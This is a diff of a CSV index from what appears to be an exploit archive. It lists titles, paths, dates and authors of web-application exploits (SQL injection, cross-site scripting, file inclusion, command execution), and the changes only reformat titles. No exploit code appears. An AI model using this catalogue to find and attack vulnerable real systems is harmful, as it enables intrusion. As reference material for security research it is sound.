+24192,platforms/php/webapps/24192.txt,"PHP-Nuke 6.x/7.x Reviews Module - 'order' SQL Injection",2004-06-11,"Janek Vind",php,webapps,0 24193,platforms/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 24194,platforms/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x Reviews Module - Multiple Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 -24197,platforms/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 - Next_file Parameter Cross-Site Scripting",2004-06-14,scriptX,cgi,webapps,0 +24197,platforms/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 - 'Next_file' Cross-Site Scripting",2004-06-14,scriptX,cgi,webapps,0 24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting",2004-06-14,"Thomas Ryan",asp,webapps,0 24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 - 'SSI.php' Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",php,webapps,0 24201,platforms/php/webapps/24201.txt,"PHP-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps,0 @@ -27605,10 +27606,10 @@ id,file,description,date,author,platform,type,port 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - 'module_db.php' Remote File Inclusion",2004-06-15,loofus,php,webapps,0 -24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0 +24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - 'Registration_Rules.asp' Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - 'usersL.php3' Multiple SQL Injections",2004-06-15,HEX,php,webapps,0 24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3?do_not_login' Authentication Bypass",2004-06-15,HEX,php,webapps,0 -24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access",2004-06-15,HEX,php,webapps,0 +24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - 'admin.php3' Arbitrary File Access",2004-06-15,HEX,php,webapps,0 24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 - Attachment Remote Command Execution",2004-06-21,"Guy Pearce",php,webapps,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps,0 24228,platforms/php/webapps/24228.txt,"Joomla! Component com_collector - Arbitrary File Upload",2013-01-19,"Red Dragon_al",php,webapps,0 @@ -27631,12 +27632,12 @@ id,file,description,date,author,platform,type,port 24255,platforms/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 24256,platforms/php/webapps/24256.php,"Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 -24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 -24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 +24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - 'comersus_gatewayPayPal.asp' Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 +24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - 'comersus_message.asp' Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 24269,platforms/php/webapps/24269.txt,"NConf 1.3 - '/detail.php/detail_admin_items.php?id' SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 -24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x - viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 +24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x - 'viewtopic.php' PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 24279,platforms/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],php,webapps,0 24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 - Null Byte Full Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - 'Language' Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 @@ -27658,7 +27659,7 @@ id,file,description,date,author,platform,type,port 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",php,webapps,0 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module - Directory Traversal",2004-07-23,sullo@cirt.net,php,webapps,0 24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x - Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps,0 -24311,platforms/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 - Site Parameter Remote File Inclusion",2004-07-24,"Francisco Alisson",php,webapps,0 +24311,platforms/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 - 'Site' Remote File Inclusion",2004-07-24,"Francisco Alisson",php,webapps,0 24313,platforms/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_search.asp?Typeen' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24314,platforms/asp/webapps/24314.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_edit.asp?SQL' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 24315,platforms/asp/webapps/24315.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE]_list.asp?searchFor' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",asp,webapps,0 @@ -27690,10 +27691,10 @@ id,file,description,date,author,platform,type,port 24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0 24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - 'address.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,php,webapps,0 24378,platforms/php/webapps/24378.txt,"Merak Mail Server 7.4.5 - 'settings.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,php,webapps,0 -24379,platforms/php/webapps/24379.txt,"Merak Mail Server 7.4.5 - attachment.html attachmentpage_text_error Parameter Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 +24379,platforms/php/webapps/24379.txt,"Merak Mail Server 7.4.5 - 'attachment.html?attachmentpage_text_error' Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 24380,platforms/php/webapps/24380.txt,"Merak Mail Server 7.4.5 - HTML Message Body Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 24381,platforms/php/webapps/24381.txt,"Merak Mail Server 7.4.5 - address.html Full Path Disclosure",2004-07-17,Criolabs,php,webapps,0 -24382,platforms/php/webapps/24382.txt,"Merak Mail Server 7.4.5 - calendar.html schedule Parameter SQL Injection",2004-07-17,Criolabs,php,webapps,0 +24382,platforms/php/webapps/24382.txt,"Merak Mail Server 7.4.5 - 'calendar.html?schedule' SQL Injection",2004-07-17,Criolabs,php,webapps,0 24383,platforms/php/webapps/24383.php,"Gallery 1.4.4 - Remote Server-Side Script Execution",2004-07-17,aCiDBiTS,php,webapps,0 24384,platforms/php/webapps/24384.txt,"PHP-Fusion Database Backup - Information Disclosure",2004-07-18,"Ahmad Muammar",php,webapps,0 24385,platforms/asp/webapps/24385.txt,"Zixforum - ZixForum.mdb Database Disclosure",2004-07-19,"Security .Net Information",asp,webapps,0 @@ -27703,12 +27704,12 @@ id,file,description,date,author,platform,type,port 24392,platforms/php/webapps/24392.php,"Mantis 0.x - New Account Signup Mass Emailing",2004-08-21,"Jose Antonio",php,webapps,0 24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection / Directory Traversal",2004-08-21,"Jose Antonio",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 - 'News.mdb' Database Disclosure",2004-08-23,"Security .Net Information",asp,webapps,0 -24399,platforms/php/webapps/24399.txt,"PhotoADay - Pad_selected Parameter Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps,0 +24399,platforms/php/webapps/24399.txt,"PhotoADay - 'Pad_selected' Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps,0 24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 -24403,platforms/php/webapps/24403.txt,"eGroupWare 1.0 Calendar Module - date Parameter Cross-Site Scripting",2004-08-23,"Joxean Koret",php,webapps,0 +24403,platforms/php/webapps/24403.txt,"eGroupWare 1.0 Calendar Module - 'date' Cross-Site Scripting",2004-08-23,"Joxean Koret",php,webapps,0 24401,platforms/cgi/webapps/24401.txt,"Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal",2004-08-23,bashis,cgi,webapps,0 24402,platforms/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps,0 -24405,platforms/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - Login_name Parameter Cross-Site Scripting",2004-08-24,sourvivor,php,webapps,0 +24405,platforms/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - 'Login_name' Cross-Site Scripting",2004-08-24,sourvivor,php,webapps,0 24408,platforms/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal",2004-08-24,"Jerome Athias",cgi,webapps,0 24410,platforms/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps,0 24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 @@ -27793,12 +27794,12 @@ id,file,description,date,author,platform,type,port 24566,platforms/php/webapps/24566.txt,"CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting",2004-09-02,Exoduks,php,webapps,0 24573,platforms/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,multiple,webapps,0 24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x - HTML Email Command Execution",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 -24575,platforms/php/webapps/24575.txt,"PSNews 1.1 - No Parameter Cross-Site Scripting",2004-09-05,"Michal Blaszczak",php,webapps,0 +24575,platforms/php/webapps/24575.txt,"PSNews 1.1 - 'No' Cross-Site Scripting",2004-09-05,"Michal Blaszczak",php,webapps,0 24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass",2004-09-07,anonymous,cgi,webapps,0 24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 - 'thread-post.asp' Multiple Header CRLF Injections",2004-09-27,pigrelax,asp,webapps,0 24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 - 'ladder-log.asp' Multiple SQL Injections",2004-09-27,pigrelax,asp,webapps,0 24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 - 'view-profile.asp' Multiple SQL Injections",2004-09-27,pigrelax,asp,webapps,0 -24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 - Custchoice.php Update Your Password Action Information Disclosure",2004-09-07,masud_libra,php,webapps,0 +24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 - 'Custchoice.php' Update Your Password Action Information Disclosure",2004-09-07,masud_libra,php,webapps,0 24583,platforms/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 - Customer Statistics Information Disclosure",2004-09-07,masud_libra,php,webapps,0 24585,platforms/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Inclusion",2004-09-09,"Ahmad Muammar",php,webapps,0 24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps,0 @@ -27808,32 +27809,32 @@ id,file,description,date,author,platform,type,port 24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 24721,platforms/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 - 'APPEND' Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0 -24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 - down.asp HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 +24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 - 'down.asp' HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 - Administrator Command Execution",2004-09-17,"GulfTech Security",cgi,webapps,0 24612,platforms/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 - YaBB.pl IMSend Cross-Site Scripting",2004-09-17,"GulfTech Security",cgi,webapps,0 24613,platforms/php/webapps/24613.txt,"Remository - SQL Injection",2004-09-18,khoaimi,php,webapps,0 24614,platforms/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) - Cross-Site Scripting",2004-09-20,"Joxean Koret",php,webapps,0 -24615,platforms/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) - Function.php Arbitrary Command Execution",2004-09-20,"Joxean Koret",php,webapps,0 +24615,platforms/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) - 'Function.php' Arbitrary Command Execution",2004-09-20,"Joxean Koret",php,webapps,0 24616,platforms/php/webapps/24616.txt,"TUTOS - 'file_overview.php?link_id' SQL Injection",2004-09-20,"Joxean Koret",php,webapps,0 24617,platforms/php/webapps/24617.txt,"TUTOS - 'app_new.php?t' Cross-Site Scripting",2004-09-20,"Joxean Koret",php,webapps,0 -24625,platforms/asp/webapps/24625.txt,"FreezingCold Broadboard - search.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 -24626,platforms/asp/webapps/24626.txt,"FreezingCold Broadboard - profile.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 +24625,platforms/asp/webapps/24625.txt,"FreezingCold Broadboard - 'search.asp' SQL Injection",2004-09-27,pigrelax,asp,webapps,0 +24626,platforms/asp/webapps/24626.txt,"FreezingCold Broadboard - 'profile.asp' SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0 24629,platforms/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0 24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion",2004-09-27,"Himeur Nourredine",php,webapps,0 24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps,0 -24642,platforms/php/webapps/24642.txt,"WordPress 1.2 - 'admin-header.php' redirect_url Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24642,platforms/php/webapps/24642.txt,"WordPress 1.2 - 'admin-header.php?redirect_url' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 24643,platforms/php/webapps/24643.txt,"WordPress 1.2 - 'bookmarklet.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps,0 -24644,platforms/php/webapps/24644.txt,"WordPress 1.2 - 'categories.php' cat_ID Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24645,platforms/php/webapps/24645.txt,"WordPress 1.2 - 'edit.php' s Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24644,platforms/php/webapps/24644.txt,"WordPress 1.2 - 'categories.php?cat_ID' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24645,platforms/php/webapps/24645.txt,"WordPress 1.2 - 'edit.php?s' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 24646,platforms/php/webapps/24646.txt,"WordPress 1.2 - 'edit-comments.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps,0 24647,platforms/php/webapps/24647.txt,"Parachat 5.5 - Directory Traversal",2004-09-28,"Donato Ferrante",php,webapps,0 24648,platforms/php/webapps/24648.txt,"W-Agora 4.1.6 - 'a redir_url.php?key' SQL Injection",2004-09-30,"Alexander Antipov",php,webapps,0 24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 - 'a forgot_password.php?userid' Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 24650,platforms/php/webapps/24650.txt,"W-Agora 4.1.6 - 'a download_thread.php?thread' Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 -24651,platforms/php/webapps/24651.txt,"W-Agora 4.1.6 - a subscribe_thread.php HTTP Response Splitting",2004-09-30,"Alexander Antipov",php,webapps,0 -24652,platforms/php/webapps/24652.txt,"W-Agora 4.1.6 - a 'login.php' loginuser Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 +24651,platforms/php/webapps/24651.txt,"W-Agora 4.1.6a - 'subscribe_thread.php' HTTP Response Splitting",2004-09-30,"Alexander Antipov",php,webapps,0 +24652,platforms/php/webapps/24652.txt,"W-Agora 4.1.6a - 'login.php?loginuser' Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0 24657,platforms/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0 24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 @@ -27848,7 +27849,7 @@ id,file,description,date,author,platform,type,port 24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0 24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0 24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0 -24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 +24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form 'Password' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0 @@ -27875,7 +27876,7 @@ id,file,description,date,author,platform,type,port 24731,platforms/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps,0 24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x - 'FOLLOW.php' SQL Injection",2004-11-11,"Janek Vind",php,webapps,0 24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - 'send.php?tid' Cross-Site Scripting",2004-11-12,"digital ex",php,webapps,0 -24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 +24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - 'send.php' Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 24736,platforms/php/webapps/24736.txt,"phpWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 24737,platforms/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook - Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps,0 24739,platforms/php/webapps/24739.txt,"PowerPortal 1.3 - SQL Injection",2004-11-14,ruggine,php,webapps,0 @@ -27888,7 +27889,7 @@ id,file,description,date,author,platform,type,port 24759,platforms/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",php,webapps,0 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 24766,platforms/php/webapps/24766.txt,"Nuked-klaN 1.x - Submit Link Function HTML Injection",2004-11-23,XioNoX,php,webapps,0 -24768,platforms/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - record Parameter SQL Injection",2004-11-23,"James Bercegay",php,webapps,0 +24768,platforms/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - 'record' SQL Injection",2004-11-23,"James Bercegay",php,webapps,0 24769,platforms/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"James Bercegay",php,webapps,0 24771,platforms/php/webapps/24771.txt,"KorWeblog 1.6.2 - Remote Directory Listing",2004-11-24,"Jeremy Bae",php,webapps,0 24772,platforms/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",php,webapps,0 @@ -27919,7 +27920,7 @@ id,file,description,date,author,platform,type,port 24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php?URL' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php?Username' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24831,platforms/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24832,platforms/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - 'Relationship.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 @@ -27959,7 +27960,7 @@ id,file,description,date,author,platform,type,port 24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php?loginid' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php?what' Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 -24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php p' Paramete' Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 +24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php?p' Paramete' Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 @@ -27992,15 +27993,15 @@ id,file,description,date,author,platform,type,port 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0 24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 -24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/post.ph'p content Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/templates.php' file Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/post.php?content' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/templates.php?file' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 - 'link-add.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-16,"Thomas Waldegger",php,webapps,0 -24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 - 'link-categories.php' cat_id Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 - 'link-categories.php?cat_id' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 24992,platforms/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 - 'link-manager.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-16,"Thomas Waldegger",php,webapps,0 -24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - 'moderation.php' item_approved Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - 'moderation.php?item_approved' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injections",2005-03-02,"benji lemien",php,webapps,0 -25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 - Nav.php3 Cross-Site Scripting",2005-03-03,benjilenoob,php,webapps,0 +25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 - 'Nav.php3' Cross-Site Scripting",2005-03-03,benjilenoob,php,webapps,0 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension - SQL Injection",2005-03-03,"Fabian Becker",php,webapps,0 25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",php,webapps,0 